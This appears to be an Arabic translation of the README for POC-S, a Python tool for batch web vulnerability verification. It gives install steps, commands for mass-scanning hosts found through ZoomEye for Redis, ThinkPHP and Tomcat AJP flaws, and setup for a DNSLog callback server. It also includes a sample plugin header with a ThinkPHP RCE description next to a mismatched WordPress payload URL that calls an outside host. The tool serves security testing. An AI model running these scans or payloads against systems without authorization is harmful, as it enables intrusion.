
نسخة معززة من POC-T هي POC-S، تُستخدم للتحقق السريع من ثغرات تطبيقات الويب في مواجهة الفريق الأحمر والأزرق، مع تعزيز الوظائف وإضافة نصوص برمجية مصنفة، وتأتي مع سجل DNS مدمج وغيرها. المنصة تكمّل بوكسات عالية التوفر من أجهزة vulhub المستهدفة ومشاريع مفتوحة المصدر أخرى.
وثائق POC-T موجودة في مجلد doc
مقدمة: حالياً
استخدام POC-S لاستهداف أي هدف دون موافقة مسبقة من الطرفين غير قانوني. POC-S مخصص لأغراض اختبار الأمان فقط
المهام المتبقية
نظراً لأن واجهات الطرف الثالث تتطلب مصادقة، يمكن استخدام معامل --init لتهيئة تكوينات الواجهة الخاصة بك، مثال: --init zoomeye
pip install pocs
التثبيت من المصدر:
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install
إذا ظهر خطأ 'Some files missing' أثناء تثبيت pocs عبر pip، فانتقل إلى دليل تثبيت pocs (python2.7\Lib\site-packages\pocs) وأعد تسمية tookit.conf. إذا ظهر تحذير
WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments.فهو مشكلة في تبعيات الحزمة. يرجى التحقق من إصدارات الحزم وتحديثها: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11
pocs -s test/test2.py -iS 127.0.0.1 # تحميل السكربت script/test/test2.py
pocs -s test2 -iS 127.0.0.1 # تحميل السكربت script/test2.py
pocs -b test -iS 127.0.0.1 # تحميل جميع السكربتات في مجلد /script/test دفعة واحدة
pocs -b test -s test2.py -iS 127.0.0.1 # تحميل السكربت script/test/test2.py
pocs -s myself_script.py -iS 127.0.0.1 # تحميل سكربت مخصص ومجلد السكربتات المخصصة
pocs -b mydir -iS 127.0.0.1
pocs --init zoomeye // تهيئة معلومات تكوين zoomeye
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"
استخدام ZoomEye للبحث الجماعي عن ثغرة CNVD-2020-10487 tomcat ajp lfi
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

إذا كنت لا تزال تعاني من عدم استقرار ceye، وليس لديك الوقت أو الطاقة لبناء منصة DNSLog (تحتاج إلى اسمي نطاق وعنوان IP عام، كما يجب أن يكون النطاق قادراً على تعديل خوادم DNS)، فجرّب منصة dnslog البسيطة التي يوفرها POC-S، والتي تحتاج فقط إلى اسم نطاق واحد وعنوان IP عام، وتوفر واجهة API للتحقق (بدون واجهة).
افترض أن dnslog.xxx.cn هو اسم النطاق العام الخاص بك، و x.x.x.x هو عنوان IP العام، تأكد من أن dnslog.xxx.cn يمكن حله إلى x.x.x.x بشكل صحيح، وإلا فلن تتمكن من الوصول إلى API.
قم بتشغيل الأمر على الخادم العام (x.x.x.x):
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88 (إذا لم يتم التثبيت عبر pip، يمكن تشغيل السكربت pocs.dnslog.py مباشرة)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x
أمر سجل DNS، يدعم فقط أمر nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x
إذا كنت تريد استخدام الأمر ping 1234.dnslog.xxx.cn، يمكنك أيضاً تكوين خادم أسماء مخصص لنطاق xxx.cn (راجع تكوين DNSLog).
أمر سجل الويب: curl http://dnslog.xxx.cn:88/weblog/poc123
عنوان واجهة API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn
المعلمات:
- token (مطلوب) مفتاح API الذي أدخلته عند بناء dnslog
- type (مطلوب) القيم الممكنة: dns / web
- filter (اختياري) لتصفية السجلات، تطابق تام
pocs توفر طريقة أكثر مرونة لتصنيف الإضافات. حالياً، هناك أربعة أنواع من POC: Fuzz POC, OWASP POC, Vuln POC, Tool POC. سيتم جمع بعض POC من GitHub قدر الإمكان، ولكن ليس كثيراً، لذا ستحتاج إلى جمعها وتنظيمها بنفسك.
سيتم كتابة POC بأكبر قدر ممكن من التوحيد القياسي، مع اتباع نمط كتابة POC-T. مثال أدناه:
#!/usr/bin/env python
#coding:utf-8
"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞
Desc
2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
1. python POC-S.py -s
2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
https://www.seebug.org/vuldb/ssvid-9771
"""
import requests
def poc(url):
pass
مشتق أساساً من كتابة إضافات vulhub وإضافات POC-T المضمنة، مع إضافة بعض POC عالية القابلية للاستخدام. كل POC مدرج أدناه تم التحقق منه من خلال بناء بيئة اختبار خاصة، إذا كان هناك أي POC خاطئ، يرجى فتح issue للتواصل معي.
المصدر: boy-hack/POC-T
المصدر: نصوص كشف hunter
بعض POC الأدوات الشائعة، توفر محركات بحث، استعلام معلومات، إلخ.
POC مفتوحة المصدر أخرى، مثل مشروع https://github.com/boy-hack/airbug الذي يجمع بعض POC يمكن استخدامها مباشرة، ولكن هناك مكتبة HackRequest مخصصة لـ Python 3، يلزم تعديلها لـ Python 2. يمكن تثبيت المكتبة المعدلة من: https://github.com/jiangsir404/hack-requests